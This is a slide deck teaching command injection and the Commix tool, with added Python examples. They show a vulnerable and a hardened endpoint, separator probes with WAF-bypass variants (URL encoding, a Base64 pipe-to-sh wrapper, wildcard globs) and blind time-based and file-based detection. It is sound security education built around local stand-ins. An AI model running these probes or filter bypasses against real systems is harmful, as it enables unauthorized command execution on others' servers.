Commix
The Command Injector
Who am I?
Working as an Application Security Tester
Contact me: @rs.a0007@gmail.co
Agenda
• Introduction to Command Injection
• Why and where may Command Injection occur?
• Types of Command Injection
• Detection techniques
• Intro to Commix
• Commix Architecture
• Features and modules of Commix
• Demo
What is Command Injection?
• Command injection is an attack whose goal is the execution of arbitrary
commands on the host operating system via a vulnerable application
• Command injection attacks are possible when an application passes unsafe
user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.
The injected commands run with the privileges of the vulnerable application
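The definition above in working code, as an added example (not code from the deck or from Commix): a constructed "ping this host" feature that builds a shell string out of the `host` parameter, beside a hardened version that allow-lists the value and hands it to the program as a single argv element with no shell in between, plus the results-based probe a tester would run against both. The feature itself, the `HOST_RE` allow-list and the `INJECTED` marker are assumptions made for the demo; the code needs Python 3.7+.

```python
"""Command injection: a vulnerable 'ping this host' feature beside its hardened form.

Added example for this deck; not code from Commix or the original slides.
The feature, the HOST_RE allow-list and the INJECTED marker are constructed.
"""
import re
import subprocess

# Constructed attacker input: ';' ends the intended ping and starts a new command.
PAYLOAD = "127.0.0.1; echo INJECTED"

# Allow-list for hostnames/IPs: letters, digits, dots and hyphens only.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def ping_vulnerable(host: str) -> str:
    """Builds one command string from user input; /bin/sh then parses the ';'."""
    cmd = "ping -c 1 " + host
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=20)
    # Even if ping is missing on this box, the shell still runs the second command.
    return proc.stdout + proc.stderr


def ping_hardened(host: str) -> str:
    """Validate against the allow-list, then exec without a shell: the whole value
    becomes exactly one argv entry, so separators are never interpreted."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("rejected host: %r" % host)
    argv = ["ping", "-c", "1", host]
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=20)
    except FileNotFoundError:
        return "ping is not installed"
    return proc.stdout + proc.stderr


def results_based_probe(endpoint, payload: str = PAYLOAD, marker: str = "INJECTED") -> bool:
    """Results-based detection: did the output of the appended command come back?"""
    try:
        response = endpoint(payload)
    except ValueError:
        return False  # input validation rejected the probe outright
    return marker in response


if __name__ == "__main__":
    print("vulnerable endpoint injectable:", results_based_probe(ping_vulnerable))
    print("hardened endpoint injectable:  ", results_based_probe(ping_hardened))
```

If a shell cannot be avoided (for example a legacy wrapper script), quote the value with `shlex.quote` in addition to allow-listing it; the argv form above is still the better fix because it removes the shell, and with it every separator, from the path the user data takes.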
Where may command injections exist?
• ADSL SOHO routers (e.g. D-Link, TP-Link, Linksys, ...)
• IP cameras (e.g. TP-Link, D-Link, Vivotek, Zero-IP, ...)
• Network printers (e.g. Xerox, ...)
• IP PBX applications (e.g. Asterisk PBX, FreePBX, ...)
• Raspberry Pi based web applications
• Web applications (e.g. IBM, Sophos, Symantec, LanDesk, Cacti, SquirrelMail, ...)
• Arduino based web applications
Why do command injections occur?
• The root cause is always the same: the application builds a shell command
string out of untrusted input instead of passing that input as plain data
• Command injection attacks are OS-independent
  • They can occur on Windows, Linux, Unix, etc.
• They are also programming-language independent
  • They may occur in applications written in C, C++, C#, PHP, Java, Perl,
Python, Ruby, etc.
  • ...or in web applications built on frameworks such as ASP.NET, Python
Django, Ruby on Rails, CGI, etc.
Types of Command Injection
• Results-based Command Injection
  • The output of the injected command is visible in the vulnerable application's response
  • The attacker can directly tell whether the command injection succeeded
• Blind Command Injection
  • The vulnerable application does not return the results of the injected
command
  • The attacker cannot see the results of the injected commands on the screen
Blind Command Injection - Techniques
There are two techniques for approaching blind command injection:
• Time-based Command Injection
  • The result of the injected command is inferred from "time delays": the
response arrives N seconds later when an injected sleep N actually executes
• File-based (tempfile-based) Command Injection
  • The output of the injected command is redirected into a file that is
accessible on the vulnerable application (e.g. under the web root) and read back
How to detect command injection?
• Append a second command to the parameter using shell separators such as
; & | && || or a newline (%0a), or command substitution with backticks or
$( ), then look for its output (results-based) or its side effect (blind)
Techniques to bypass a WAF or other filters
• URL encoding
• Base64 encoding
• Wildcard obfuscation
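The detection and filter-evasion techniques on this slide as an added example (not Commix's code): it builds the separator probes, then the URL-encoded, Base64-wrapped and wildcard-obfuscated variants of the same injected command, and runs them against `naive_filter`, a constructed blacklist rule standing in for a WAF. It also carries the check a practitioner wants before using a wildcard payload: whether the glob actually resolves to one binary. The benign value `127.0.0.1`, the command `id`, its path `/usr/bin/id` and the filter's blocklist are all assumptions for the demo; nothing is sent or executed.

```python
"""Command-injection probes: shell separators plus the three filter-evasion
tricks on the slide (URL encoding, Base64 encoding, wildcard obfuscation).

Added example; not Commix's code. `naive_filter` is a constructed stand-in for a
blacklist WAF rule, and the probes are only built as strings, never sent or run.
"""
import base64
import glob
import urllib.parse

# Shell metacharacters that terminate the intended command and start the injected one.
SEPARATORS = [";", "&&", "||", "&", "|", "\n"]


def separator_payloads(benign: str, cmd: str) -> list:
    """One probe per separator, e.g. '127.0.0.1;id' and '127.0.0.1\\nid'."""
    return [benign + sep + cmd for sep in SEPARATORS]


def percent_encode_all(payload: str) -> str:
    """URL-encode every byte, letters included: '127.0.0.1;id' -> '%31%32%37...'.
    Only useful when the filter inspects the query string before it is decoded."""
    return "".join("%%%02X" % b for b in payload.encode())


def roundtrip_ok(payload: str) -> bool:
    """Check that the target's URL decoder would recover the original command."""
    return urllib.parse.unquote(percent_encode_all(payload)) == payload


def base64_wrap(cmd: str) -> str:
    """Hide the command text behind Base64; the pipe decodes and runs it on the target.
    The wrapper itself still contains '|', so it does not beat a separator blacklist."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return "echo " + b64 + "|base64 -d|sh"


def wildcard_obfuscate(path: str) -> str:
    """Mask every path component with '?' of the same length, keeping the first
    character of the binary name so the glob stays specific: '/usr/bin/id' ->
    '/???/???/i?'. The target's shell expands the glob before executing it."""
    comps = path.split("/")
    masked = ["?" * len(c) for c in comps[:-1]]
    last = comps[-1]
    masked.append(last[:1] + "?" * (len(last) - 1))
    return "/".join(masked)


def expands_uniquely(pattern: str, expected: str) -> bool:
    """Practitioner check, run on a box resembling the target: an ambiguous glob
    (e.g. one that also matches /usr/bin/ip) runs the wrong program or fails."""
    return glob.glob(pattern) == [expected]


def naive_filter(value: str) -> bool:
    """Constructed blacklist WAF rule; True means the request is allowed through."""
    blocked = (";", "|", "&", "`", "$(", "id", "cat")
    return not any(b in value for b in blocked)


def build_variants(benign: str = "127.0.0.1", cmd: str = "id",
                   binary: str = "/usr/bin/id") -> dict:
    """The same injected command in plain, newline-separated and encoded forms."""
    return {
        "plain": benign + ";" + cmd,
        "newline": benign + "\n" + cmd,
        "urlencoded": percent_encode_all(benign + ";" + cmd),
        "base64": benign + ";" + base64_wrap(cmd),
        "wildcard": benign + "\n" + wildcard_obfuscate(binary),
    }


def first_bypass(filter_ok, variants: dict):
    """Name of the first variant the filter lets through, or None if all are blocked."""
    for name, probe in variants.items():
        if filter_ok(probe):
            return name
    return None


if __name__ == "__main__":
    variants = build_variants()
    for name, probe in variants.items():
        print("%-10s allowed=%-5s %r" % (name, naive_filter(probe), probe))
    print("wildcard resolves uniquely here:",
          expands_uniquely(wildcard_obfuscate("/usr/bin/id"), "/usr/bin/id"))
```

Against this particular blocklist the newline separator is not enough on its own (the command name is still visible), Base64 fails because the decoding pipe reintroduces a blocked character, and full percent-encoding or the wildcard form gets through; which variant works depends entirely on what the filter inspects and when it decodes, so try them in order rather than assuming one.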
About Commix
• Commix is short for COMMand Injection eXploiter
• It is designed by Anastasios Stasinopoulos
• It aims to help web developers, penetration testers and security researchers
test and exploit command injection vulnerabilities in web applications
• It makes it very easy to find and exploit a command injection vulnerability in
certain parameters or HTTP headers
• Commix is written in Python
• It requires Python version 2.6.x or 2.7.x to run
Supports
• Supported platforms
  • Linux
  • Mac OS X
  • Windows (experimental)
• Available in the following distros
  • ArchStrike
  • BlackArch Linux
  • BackBox
  • Kali Linux
  • Parrot Security OS
  • Weakerthan Linux
Architecture of Commix
Reduced False Positives
• On results-based command injection
  • Prints the results in three lines:
    • Type of technique
    • Which technique
    • Payload
• On blind (time-based) command injection
  • Measures the average response time of the server
  • Uses that average as the baseline against which the injected delays are
tested, so a merely slow server is not mistaken for a successful injection
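The two blind techniques from the "Blind Command Injection - Techniques" slide, detected the way the slide above describes for Commix (measure a baseline, then test against it), as an added example that is not Commix's code. `blind_vulnerable` and `blind_hardened` are constructed stand-ins for a web app that runs a shell command but never returns its output, the temporary directory plays the web-readable directory for the file-based technique, and the `sleep` pause, the `0.8` tolerance and the marker string are assumptions for the demo. It needs Python 3 on a POSIX host.

```python
"""Blind command injection: time-based and file-based detection with a measured
baseline, the approach the slides describe for Commix.

Added example; not Commix's code. `blind_vulnerable`, `blind_hardened` and the
temp-directory 'web root' are constructed stand-ins for a web app that runs a
shell command but never returns its output.
"""
import os
import re
import subprocess
import tempfile
import time

PAUSE = 1.0  # seconds of sleep the probe injects
WEBROOT = tempfile.mkdtemp(prefix="webroot-")  # stand-in for a web-readable directory


def blind_vulnerable(host: str) -> None:
    """Runs the command via /bin/sh and discards all output (blind)."""
    subprocess.run("ping -c 1 " + host, shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=30)


def blind_hardened(host: str) -> None:
    """Allow-list the value and exec without a shell; output is still discarded."""
    if not re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host):
        return
    try:
        subprocess.run(["ping", "-c", "1", host],
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=30)
    except FileNotFoundError:
        pass


def timed(endpoint, value: str) -> float:
    """Seconds the endpoint takes to answer one request."""
    start = time.monotonic()
    endpoint(value)
    return time.monotonic() - start


def baseline(endpoint, benign: str, samples: int = 3) -> float:
    """Average response time of untampered requests: the reference point that
    keeps a slow server from looking like a successful injection."""
    return sum(timed(endpoint, benign) for _ in range(samples)) / samples


def time_based_probe(endpoint, benign: str = "127.0.0.1", pause: float = PAUSE) -> bool:
    """Inject 'sleep N', then 'sleep 2N'. Only a delay that tracks the requested
    pause on top of the baseline, twice, counts as an injection; the 0.8 factor
    absorbs normal jitter between the baseline samples and the probe."""
    base = baseline(endpoint, benign)
    extra1 = timed(endpoint, benign + ";sleep " + str(int(pause))) - base
    if extra1 < 0.8 * pause:
        return False
    extra2 = timed(endpoint, benign + ";sleep " + str(int(2 * pause))) - base
    return extra2 >= 0.8 * 2 * pause


def file_based_probe(endpoint, benign: str = "127.0.0.1", marker: str = "cmdi-marker") -> bool:
    """Redirect the injected command's output into a web-readable file, then fetch
    that file (here: read it from the temp web root) and look for the marker."""
    path = os.path.join(WEBROOT, "probe.txt")
    endpoint(benign + ";echo " + marker + ">" + path)
    try:
        with open(path) as fh:
            return marker in fh.read()
    except FileNotFoundError:
        return False
    finally:
        if os.path.exists(path):
            os.remove(path)


if __name__ == "__main__":
    for name, ep in (("vulnerable", blind_vulnerable), ("hardened", blind_hardened)):
        print(name, "time-based:", time_based_probe(ep), "file-based:", file_based_probe(ep))
```

The second, doubled delay is what makes the time-based verdict trustworthy: a single slow response can happen for many reasons, but a response that is late by exactly the amount you asked for, twice in a row, is the injected `sleep` running.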
Features of Commix
• Lets you supply your own HTTP headers
• Supports injecting through those headers as well as through request parameters
• Supports enumeration options such as:
  • Current user
  • Current hostname
  • Whether the user has root privileges
  • System information
  • System users list, etc.
Modules
• The "ICMP exfiltration" module
  • Provides a server-side component to receive and store files exfiltrated
over ICMP echo request packets
• The "Shellshock" module
  • Exploits the Shellshock bash vulnerability (CVE-2014-6271), which allows an
attacker to remotely execute shell commands by attaching malicious code to
environment variables that the operating system passes to bash
• Develop and easily import your own modules
  • Extend the capabilities of Commix and/or adapt it to your needs
It’s Demo Time
Testbeds
• Commix testbed - https://github.com/commixproject/commix-testbed
• Pentester Academy command injection ISO - https://www.vulnhub.com/entry/command-injection-iso-1,81/
• bWAPP (bee-box) - https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
• XVWA - https://github.com/s4n7h0/xvwa
• DVWA - http://www.dvwa.co.uk/
• OWASP Mutillidae - https://sourceforge.net/projects/mutillidae/
References
• OWASP - https://www.owasp.org/index.php/Command_Injection
• Commix - http://www.commixproject.com/
• Usage examples - https://github.com/commixproject/commix/wiki/Usage-Examples
Any Questions?